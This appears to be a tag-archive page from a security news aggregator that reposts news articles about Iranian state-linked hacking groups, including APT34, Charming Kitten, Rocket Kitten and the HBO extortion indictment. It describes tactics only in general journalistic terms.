now browsing by tag



THE INTERNATIONAL INTELLIGENCE agency always has a keen interest in Iran’s hacking activity. And new research published by the security firm FireEye on Thursday indicates the country’s efforts show no signs of slowing. In fact, a new network reconnaissance group— FireEye calls them Advanced Persistent Threat 34—has spent the last few years burrowing deep into critical infrastructure companies.

Given how aggressively Iran has pursued infrastructure hacking, previously targeting the financial sector and even a dam in upstate New York, the new findings serve as a warning, and highlight the evolving nature of the threat.

FireEye researchers tracked 34 of the group’s attacks on institutions in seven Middle Eastern countries between 2015 and mid-2017, but says APT 34 has been operational since at least 2014. The group appears to target financial, energy, telecommunications, and chemical companies, and FireEye says it has moderate confidence that its hackers are Iranians. They log into VPNs from Iranian IP addresses, adhere to normal Iranian business hours, their work has occasionally leaked Iranian addresses and phone numbers, and their efforts align with Iranian interests. Namely, targeting the country’s adversaries.

New APT in Town

There isn’t definitive evidence of a direct link between APT 34 and APT 33, an Iranian hacking group and malware distributor FireEye published findings on in September. But researchers have seen APT 34 operating concurrently inside many of the same target networks as other Iranian hackers.

“We have seen, and this is with a lot of the Iranian actors, a very disconcerting or aggressive posture towards critical infrastructure organizations,” says John Hultquist, director of intelligence analysis at FireEye. “APT 33 has targeted a lot of organizations in critical infrastructure in the Middle East and so has APT 34. They obviously represent opportunities for intelligence collection. But we always have to think about the alternative use of those intrusions or accesses as possible means for disruption and destruction, especially given the destructive incidents we’ve already seen with other Iranian actors.”

To establish what Hultquist describes as beachheads, APT 34 uses involved operations to move deeper and deeper into a network, or exploit a toehold within one organization to pivot into another. FireEye has observed the group compromising someone’s email account at a target company, rifling through their archive, and restarting threads as old as a year, to trick the recipient into clicking a malicious attachment. The hackers also use compromised email accounts to spearphish other companies, and leapfrog into their systems as well.

While the APT 34 Iranian hacking activity doesn’t appear to target the United States, any Iranian efforts in that space are noteworthy. The countries have a long history of cyber antagonism, which includes the deployment of Stuxnet, malware thought to be a product of the NSA and their Israeli counterparts, to cripple Iran’s uranium enrichment activities. Tensions between the countries have escalated recently as well, with President Donald Trump recently taking steps to decertify the nuclear agreement between the US and Iran.

‘A Multilayered Approach’
APT 34 uses malicious Excel macros and PowerShell-based exploits to move around networks. The group also has fairly extensive social media operations, deploying fake or compromised accounts to scope out high-profile targets, and using social engineering to get closer to particular organizations. FireEye researchers speculate that APT 34 may be a reconnaissance and persistence unit, focused on finding ways into new networks and broadening access within existing targets. Some evidence indicates that the group may work directly for the Iranian government, but it’s also possible that the hackers are effectively contractors, selling backdoors to the government as they find them.

“When you look at this, it’s a multilayered approach,” says Jeff Bardin, the chief intelligence officer of the threat-tracking firm Treadstone 71, which monitors Iranian hacking activity. “They get in and make a lot of modifications, download new malware, manipulate the memory, so it’s definitely pretty sophisticated. And the Powershell activity has been largely a hallmark of Iranian activity lately. They change their tactics constantly. The more we divulge things we know about them, the more they’ll shift and change.”

Though much remains unknown about APT 34, its capabilities and prowess make the group’s interest in critical infrastructure targets all the more noteworthy, whether it’s tasked with carrying out full operations itself, or charged with laying the groundwork for others to do so.

“This is yet another example of Iranian cyber capability, which only seems to grow every day,” FireEye’s Hultquist says. “It’s a challenge for people who are concerned with Iranian actors, and as geopolitics shifts, the number of people who should be concerned with Iranian actors will probably only increase.”

View full post on National Cyber Security Ventures

Iranian #Hackers Have Set Up a #News Outlet to #Court Possible #Targets, #Security Firm Says

Iranian #Hackers Have Set Up a #News Outlet to #Court Possible #Targets, #Security Firm SaysAn Iranian cyber espionage group known as Charming Kitten is believed to be behind a campaign targeting academic researchers, human rights activists, media outlets and political advisors focusing on Iran, according to a report published earlier this week by Israel-based threat intelligence company ClearSky Cyber Security. The group has also set up a news outlet […] View full post on | Can You Be Hacked?

Iranian #national #charged with #hacking #HBO

Source: National Cyber Security – Produced By Gregory Evans

The Department of Justice on Tuesday charged an Iranian national with hacking the computer servers of HBO and seeking to extort the company after stealing episodes and scripts of popular shows, including “Game of Thrones.”

Behzad Mesri, aka “Skote Vashat,” was charged with fraud, aggravated identity theft and interstate transmission of an extortionate communication, among other charges, according to a new unsealed indictment.

According to the U.S. Attorney’s Office in the Southern District of New York, Mesri is not in custody. The FBI released a “wanted” poster of Mesri Tuesday afternoon, and said he speaks Farsi, currently resides in Iran and is a flight risk.

The prosecutors’ office also said they were not aware of any U.S. lawyer for the defendant.

Assistant director in charge of the FBI’s New York field office Bill Sweeney said at a news briefing that Mesri “lurked in the alleyways of the Internet, identified the vulnerabilities of his victim, pickpocketed their information from thousands of miles away and sought a ransom. Today’s charges show that international cybercriminals are never beyond the reach of U.S. laws.”

Mesri, who was a “self-professed expert in computer hacking techniques,” according to the indictment, at one point worked on behalf of the Iranian military to “conduct computer network attacks that targeted military systems, nuclear software systems and Israeli infrastructure.”

The indictment also reveals Mesri defaced hundreds of websites in both the U.S. and globally under his pseudonym Skote Vashat.

Between May and August, Mesri began his hacking and extortion scheme of HBO, working to obtain “unauthorized access to HBO’s computer systems” and “steal proprietary data from those systems.”

Mesri then attempted to extort HBO for $6 million worth of Bitcoin, a form of digital currency.

The confidential and proprietary data belonging to HBO he stole included video files of unaired episodes of “Ballers,” “Barry,” “Room 104,” “Curb Your Enthusiasm,” and “The Deuce,” scripts and plots for “Game of Thrones,” cast and crew contact lists, financial documents, emails belonging to at least one HBO employee, and log in information for HBO social media accounts.

The extortion scheme began in July, the indictment alleges.

“Hi to All losers! Yes it’s true! HBO is hacked! … Beware of heart Attack!!!” an anonymous email sent to HBO personnel on July 23 included in the complaint reads. The email claimed 1.5 terabytes of data was stolen.

The indictment alleges starting around July 30 and continuing to at least August, the defendant leaked portions of the stolen data to the Internet on websites he controlled.

HBO, which is owned by Time Warner, struggled over the summer with numerous high-profile hackings. A group called OurMine hijacked HBO’s main Twitter account, as well as other HBO shows’ accounts.

The post Iranian #national #charged with #hacking #HBO appeared first on National Cyber Security Ventures.

View full post on National Cyber Security Ventures

Facebook’s new alert system warned the US about Iranian hackers

Source: National Cyber Security – Produced By Gregory Evans

Facebook’s new alert system warned the US about Iranian hackers

How do you think the US would find out about a state-sponsored hack from Iran? SophisticatedSECURITY SOFTWARE? Surveillance? Nope — Facebook. According to the New York Times, State Department officials were tipped off about an Iranian hacking campaign thanks to Facebook implementing a government attack alert system just last month. They knew something was up when they got messages about being the victims of “state-sponsored actors.” Reportedly, the cyberattackers were hoping to use the social networkingACCOUNTS of younger government staff to compromise other, more prominent staffers in the government division. Iran is no stranger to online spying, including through social links. It once created a fake news site to trick officials into compromising theirACCOUNTS, and it launched a hacking campaign last year that targeted everyone from government higher-ups to dissidents. However, this latest attempt was clearly very sophisticated, an unnamed official tells the NYT. The intruders were aware of which people were working on Iranian policy following its nuclear agreement with the US, and the bottom-up approach is considerably smarter than the all-out Russian attacks from recent memory. From allINDICATIONS, Iran is trying to get away with as much hacking as it can without wrecking its nuclear deal — it’s […]

For more information go to, http://www., or

The post Facebook’s new alert system warned the US about Iranian hackers appeared first on National Cyber Security.

View full post on National Cyber Security

Security Researchers Breach Phishing Server Belonging to Iranian Hackers Rocket Kitten

Source: National Cyber Security – Produced By Gregory Evans

Security Researchers Breach Phishing Server Belonging to Iranian Hackers Rocket Kitten

Rocket Kitten is a hacking group that first appeared in April 2014 and was unmasked for the first time by FireEye researchers in May 2014. The most damning report on their activity was published this year by a joint effort betweenTREND MICRO & ClearSky. Since their first appearance, the group’s main targets were individuals and institutions that opposed or criticized the Iranian government. As both the original Trend Micro & ClearSky report and the latest Check Point findings show, the group’s MO included launching spear-phishing campaigns against its targets, using social engineering tactics, and then infecting the victims’ computers withMALWARE. Their tactics never evolved past this point, but only made small tweaks to their operations’ code to avoid detection bySECURITY TOOLS. In spite of the fact that Rocket Kitten was ousted this September, Check Point reveals that the state-sponsored hackers continued their operations regardless, making tiny changes to their malicious code and continuing to operate like nothing happened. Check Point researchers got their hands on a phishing server used by Rocket Kitten This was confirmed when Check Point researchers uncovered one of the group’s phishing servers left unprotected online. Siphoning information from the aforementioned server, security researchers managed to build […]

For more information go to, http://www., or

The post Security Researchers Breach Phishing Server Belonging to Iranian Hackers Rocket Kitten appeared first on National Cyber Security.

View full post on National Cyber Security

Israel to Create Cyber Security Authority after Alleged Iranian Hacker AttackNational Cyber Security – Israel is planning to create a new cyber defense body in order to protect itself against increasingly sophisticated cyber-attacks targeting the state’s networks, as announced by Israeli Prime Minis…

View full post on Hi-Tech Crime Solutions Weekly